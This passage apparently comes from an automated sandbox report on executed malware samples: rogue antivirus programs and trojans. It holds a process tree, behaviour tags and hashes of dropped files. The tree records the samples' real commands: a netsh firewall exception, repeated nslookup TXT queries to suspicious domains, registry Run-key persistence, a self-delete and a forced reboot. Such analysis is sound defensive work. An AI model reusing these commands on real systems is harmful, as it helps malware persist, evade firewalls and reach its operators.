                                                                            • Suspicious use of SendNotifyMessage
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:3052
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh "firewall" add allowedprogram "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\InternetSecurityGuard\[email protected]" "Internet Security Guard" ENABLE
                                                                              2⤵
                                                                                PID:3108
                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                nslookup -q=txt djmuz612iirstah.com 8.8.8.8
                                                                                2⤵
                                                                                  PID:5160
                                                                                • C:\Windows\SysWOW64\Wbem\mofcomp.exe
                                                                                  mofcomp "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\InternetSecurityGuard\6137.mof"
                                                                                  2⤵
                                                                                    PID:3208
                                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                                    nslookup -q=txt djmuz612iirstah.net 8.8.8.8
                                                                                    2⤵
                                                                                      PID:5528
                                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                                      nslookup -q=txt djmuz612iirstah.com 208.67.222.222
                                                                                      2⤵
                                                                                        PID:5640
                                                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                                                        nslookup -q=txt djmuz612iirstah.net 208.67.222.222
                                                                                        2⤵
                                                                                          PID:5776
                                                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                                                          nslookup -q=txt djmuz612iirstah.com 8.8.4.4
                                                                                          2⤵
                                                                                            PID:5848
                                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                                            nslookup -q=txt djmuz612iirstah.net 8.8.4.4
                                                                                            2⤵
                                                                                              PID:5916
                                                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                                                              nslookup -q=txt djmuz612iirstah.com 208.67.220.220
                                                                                              2⤵
                                                                                                PID:6076
                                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                                nslookup -q=txt djmuz612iirstah.net 208.67.220.220
                                                                                                2⤵
                                                                                                  PID:1632
                                                                                                • C:\Windows\SysWOW64\nslookup.exe
                                                                                                  nslookup -q=txt ddlua510gpucdip.com 8.8.8.8
                                                                                                  2⤵
                                                                                                    PID:4336
                                                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                                                    nslookup -q=txt ddlua510gpucdip.net 8.8.8.8
                                                                                                    2⤵
                                                                                                      PID:1300
                                                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                                                      nslookup -q=txt ddlua510gpucdip.com 208.67.222.222
                                                                                                      2⤵
                                                                                                        PID:1312
                                                                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                                                                        nslookup -q=txt ddlua510gpucdip.net 208.67.222.222
                                                                                                        2⤵
                                                                                                          PID:5192
                                                                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                                                                          nslookup -q=txt ddlua510gpucdip.com 8.8.4.4
                                                                                                          2⤵
                                                                                                            PID:5412
                                                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                                                            nslookup -q=txt ddlua510gpucdip.net 8.8.4.4
                                                                                                            2⤵
                                                                                                              PID:5164
                                                                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                                                                              nslookup -q=txt ddlua510gpucdip.com 208.67.220.220
                                                                                                              2⤵
                                                                                                                PID:5248
                                                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                nslookup -q=txt ddlua510gpucdip.net 208.67.220.220
                                                                                                                2⤵
                                                                                                                  PID:5332
                                                                                                                • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                  nslookup -q=txt clls406szhipps.com 8.8.8.8
                                                                                                                  2⤵
                                                                                                                    PID:5544
                                                                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                    nslookup -q=txt clls406szhipps.net 8.8.8.8
                                                                                                                    2⤵
                                                                                                                      PID:5580
                                                                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                      nslookup -q=txt clls406szhipps.com 208.67.222.222
                                                                                                                      2⤵
                                                                                                                        PID:5564
                                                                                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                        nslookup -q=txt clls406szhipps.net 208.67.222.222
                                                                                                                        2⤵
                                                                                                                          PID:5700
                                                                                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                          nslookup -q=txt clls406szhipps.com 8.8.4.4
                                                                                                                          2⤵
                                                                                                                            PID:5776
                                                                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                            nslookup -q=txt clls406szhipps.net 8.8.4.4
                                                                                                                            2⤵
                                                                                                                              PID:5888
                                                                                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                              nslookup -q=txt clls406szhipps.com 208.67.220.220
                                                                                                                              2⤵
                                                                                                                                PID:6024
                                                                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                nslookup -q=txt clls406szhipps.net 208.67.220.220
                                                                                                                                2⤵
                                                                                                                                  PID:5940
                                                                                                                              • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Live Protection Suite 2019\[email protected]
                                                                                                                                "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Live Protection Suite 2019\[email protected]"
                                                                                                                                1⤵
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:3160
                                                                                                                                • C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe
                                                                                                                                  "C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                  PID:5512
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                    dw20.exe -x -s 1576
                                                                                                                                    3⤵
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Enumerates system info in registry
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:5288
                                                                                                                              • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Movie.mpeg\[email protected]
                                                                                                                                "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Movie.mpeg\[email protected]"
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5692
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 608
                                                                                                                                  2⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:5384
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5692 -ip 5692
                                                                                                                                1⤵
                                                                                                                                  PID:5224
                                                                                                                                • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\NavaShield\[email protected]
                                                                                                                                  "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\NavaShield\[email protected]"
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:6128
                                                                                                                                • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\PC Defender\[email protected]
                                                                                                                                  "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\PC Defender\[email protected]"
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:764
                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"
                                                                                                                                    2⤵
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    PID:4420
                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                  1⤵
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:2492
                                                                                                                                  • C:\Windows\system32\srtasks.exe
                                                                                                                                    C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                                                                                                                    2⤵
                                                                                                                                      PID:2976
                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 559009B7B22822FEF8025D169E60A852 E Global\MSI0000
                                                                                                                                      2⤵
                                                                                                                                      • Modifies WinLogon for persistence
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:5292
                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                    1⤵
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    PID:4868
                                                                                                                                  • C:\Windows\System32\msiexec.exe
                                                                                                                                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\PC Defender v2\[email protected]"
                                                                                                                                    1⤵
                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    PID:5248
                                                                                                                                  • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\RegistrySmart\[email protected]
                                                                                                                                    "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\RegistrySmart\[email protected]"
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5772
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-IIG2L.tmp\is-C29PP.tmp
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-IIG2L.tmp\is-C29PP.tmp" /SL4 $4088E "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\RegistrySmart\[email protected]" 779923 55808
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5784
                                                                                                                                  • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\SE2011\[email protected]
                                                                                                                                    "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\SE2011\[email protected]"
                                                                                                                                    1⤵
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:1460
                                                                                                                                  • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Security Central\[email protected]
                                                                                                                                    "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Security Central\[email protected]"
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:6028
                                                                                                                                    • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Security Central\[email protected]
                                                                                                                                      "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Security Central\[email protected]"
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:6016
                                                                                                                                      • C:\Program Files (x86)\Security Central\Security Central.exe
                                                                                                                                        "C:\Program Files (x86)\Security Central\Security Central.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:5652
                                                                                                                                        • C:\Program Files (x86)\Security Central\Security Central.exe
                                                                                                                                          "C:\Program Files (x86)\Security Central\Security Central.exe"
                                                                                                                                          4⤵
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          • Enumerates connected drives
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:4000
                                                                                                                                  • C:\Windows\system32\sihost.exe
                                                                                                                                    sihost.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:5616
                                                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                      1⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:5364
                                                                                                                                    • C:\Windows\system32\sihost.exe
                                                                                                                                      sihost.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:5468
                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                          explorer.exe /LOADSAVEDWINDOWS
                                                                                                                                          2⤵
                                                                                                                                          • Modifies Installed Components in the registry
                                                                                                                                          • Enumerates connected drives
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:2760
                                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                        1⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:4336
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:6000
                                                                                                                                      • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                                                                                                        "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                                                                                                        1⤵
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:5316
                                                                                                                                      • C:\Windows\system32\sihost.exe
                                                                                                                                        sihost.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:692
                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                            explorer.exe /LOADSAVEDWINDOWS
                                                                                                                                            2⤵
                                                                                                                                              PID:2604
                                                                                                                                          • C:\Windows\system32\sihost.exe
                                                                                                                                            sihost.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:3120
                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                explorer.exe /LOADSAVEDWINDOWS
                                                                                                                                                2⤵
                                                                                                                                                  PID:696
                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                explorer.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:2204
                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                  C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4648
                                                                                                                                                    • C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\FakeActivation\[email protected]
                                                                                                                                                      "C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\FakeActivation\[email protected]"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1516
                                                                                                                                                        • C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
                                                                                                                                                          "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3280
                                                                                                                                                        • C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\HMBlocker\[email protected]
                                                                                                                                                          "C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\HMBlocker\[email protected]"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3784
                                                                                                                                                            • C:\Windows\SysWOW64\shutdown.exe
                                                                                                                                                              "C:\Windows\System32\shutdown.exe" /r /t 6 /f
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5524
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2503326475 /t REG_SZ /d "C:\Users\Admin\2503326475\2503326475.exe" /f
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:1480
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2503326475 /t REG_SZ /d "C:\Users\Admin\2503326475\2503326475.exe" /f
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5044
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v 2503326475_del /t REG_SZ /d "cmd /c del \"C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\HMBlocker\[email protected]\"" /f
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3224
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v 2503326475_del /t REG_SZ /d "cmd /c del \"C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\HMBlocker\[email protected]\"" /f
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:4668
                                                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                                                    C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4588
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3024
                                                                                                                                                                      • C:\Windows\system32\sihost.exe
                                                                                                                                                                        sihost.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3680
                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                            explorer.exe /LOADSAVEDWINDOWS
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:5252
                                                                                                                                                                          • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                                                                                                                                            "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5680
                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:3084
                                                                                                                                                                              • C:\Windows\system32\sihost.exe
                                                                                                                                                                                sihost.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:892
                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                    explorer.exe /LOADSAVEDWINDOWS
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5940
                                                                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                    C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4180
                                                                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:4896
                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                        explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:4884
                                                                                                                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:2292
                                                                                                                                                                                          • C:\Windows\System32\PickerHost.exe
                                                                                                                                                                                            C:\Windows\System32\PickerHost.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:3088
                                                                                                                                                                                            • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                              "LogonUI.exe" /flags:0x4 /state0:0xa3956855 /state1:0x41c64e6d
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4300

                                                                                                                                                                                              Network

                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                              Downloads

                                                                                                                                                                                              • C:\Config.Msi\e68d774.rbs

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                10KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                e196335c19eafde72885e87e0fbfee06

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                918d2d2af7ecc4fa91c6e25f50fd7fd331b86aca

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                5a93e720527c4e5c14ec16848095ef1bc9d557c49435d2958ee3a4a684c463a9

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                641f464180872aeb9d5a35623ed3523ec40ecbfb60990f72d1e11f99d295504d3042f1a1f70678fb9700ad395ef20e8dd1e1e590d62538bb63d33fdf720354a7

                                                                                                                                                                                              • C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                704KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                c65e69e26f1929679c931592ba22d8c2

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                c401c093236140570b4c17746c79cd4d48d158c1

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                7b10b187dab0c40a5b1fd8345a5639e855975bf0405cf9f2153e58f89eced67a

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                f96d725787b8d364b7f2fc06c180fe27761853dac80237d7f07602123833699ca9dac9aa600a7947e9b824a8bf8b03a7409b4527d0d0bf6e21de81b758c3ac66

                                                                                                                                                                                              • C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7.2MB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                9ce316ee1388536bb6e016563bd3c723

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                9669568be937c7f7d7f347ce3eddf158db042212

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                d9c68b713e4cde4ded31ac686b728e61c69ac77e21251b98fcbd787316cd879b

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                de98e251e866ab02cb952048b145760fd71c49deafbe31b5d761f4e1562c6edc7ff7191b8589663667a32a50e784b0d24b74b2c819ae0620ed0199796d71c6f4

                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                185B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                b8224e5293d4fad1927c751cc00c80e7

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                270b8c752c7e93ec5485361fe6ef7b37f0b4513b

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                c47da9be4fc4d757add73c49654c9179067af547d0cc758d6356e2955bbfcb61

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                8fed9a509e46319529145fa2159251e43040d26080af84e44badaab1dd339c767ff75a2c473bc0abfb448b03beb96718ee34ba6bc150ed3085322878b55a22f2

                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                381B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                578de375e22e22b459d0a4de2142aaaa

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                146546a060488be2cf7dd40779a246851bf6fbcf

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                4dbdbf366cdd4c56ad37adfef83e3868f0b767712838af2f63ba3d3e9bc4d8e7

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                fb62238bd745c9cfc7a0c07f28b9f6ca21cc9107e7056a6c73e915edf0358b4025148d86c5f66d88f002a868fba0617f0f166df45ff088b3f33507d1e5c38cf4

                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                6ba8a1c28b59d7d8617a64ad7ac5d4de

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                eb6c08aadf71be6e306a65a1082d8ea1d1ae23cb

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                7d092ea75fa1f85ae0a025f08d0c3228c0f715e7a91f82d234926e81c9f1acc6

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                5fa84004de7392c589953e651e70b64bdc8d33ae8b84d17514fa1dd13d997687655925ed13c23505ac67c9ec9d438c4c501db99379080a9018b8f6688b366709

                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                97c65eb77f49d307298c8deb0d8843c3

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                4e8e7b8d3d706b09a6d8ee5f9cd094ae7620d45a

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                074a726d0284888dc87f05cac743cd839b15fe9aaca6d86026c6c7a86541021c

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                a0ce72da32ca0b2c78efc11ef7445a76202c67953d03bd8b6c8cb286e342586f913589870505ae9cbefc0108376882b7afee7a79aee5ade70705cdae85294637

                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                23e3a51882a52171a3823d807a995f9f

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                bb175a314703fd222040a872d6513fb3257b1fc0

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                e73e3aeb4a8fb11b09637875a2e43cd1111fb3840b123193b53fb1f4b26f275f

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                506d2e1091c93887442248fac00e12dd2a38679ea3714464e282e86a241cea4275b46b2244169f33092085a9579c09dfcd37515611cec95c29c49a831b39c943

                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                f973258ff74ea8df56f9f8c2c38a5440

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                4ae3fd0b40371f8e0062eabdcac7f45803dd9986

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                ff93afaa7b68bc28188516857db81ff92962730cbe26f4a28a55fcb312edfd1a

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                e3474b1c8e9464a62eab8d4d2b44dcb39e7ec05f30410b39be7ed3e7cb9da4e1fd5d037272f74019ee9b3354e8c7ce3f594c2628d9cc0046b08d91bd77050caa

                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                8688e9af0926fc927c2e1b9bf22c3051

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                5e9608e7c7c7048daaa95d6595bd238e8228aa8f

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                499232f560411134354d4e4dcba3f0a518916319ad7352c8366124e64fe178cc

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                1c8cd5142bfbd37c4b5e4c3ef5c3c5ea865de6249509fd23f266b2229ab91b52ba7ef5d3f12fa0e91e521359a81705ec367ff3b05d4707f3259e828bc72dc596

                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                5KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                fec5bc83e72df8ffda9c0c69592c80a1

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                639a9b4e115d849fce10176112aa69c84817fd68

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                710c8b73f7d6019e388f651ce2a9a91ba5907381525c76e4b75b6f0d663038a7

                                                                                                                                                                                                SHA512

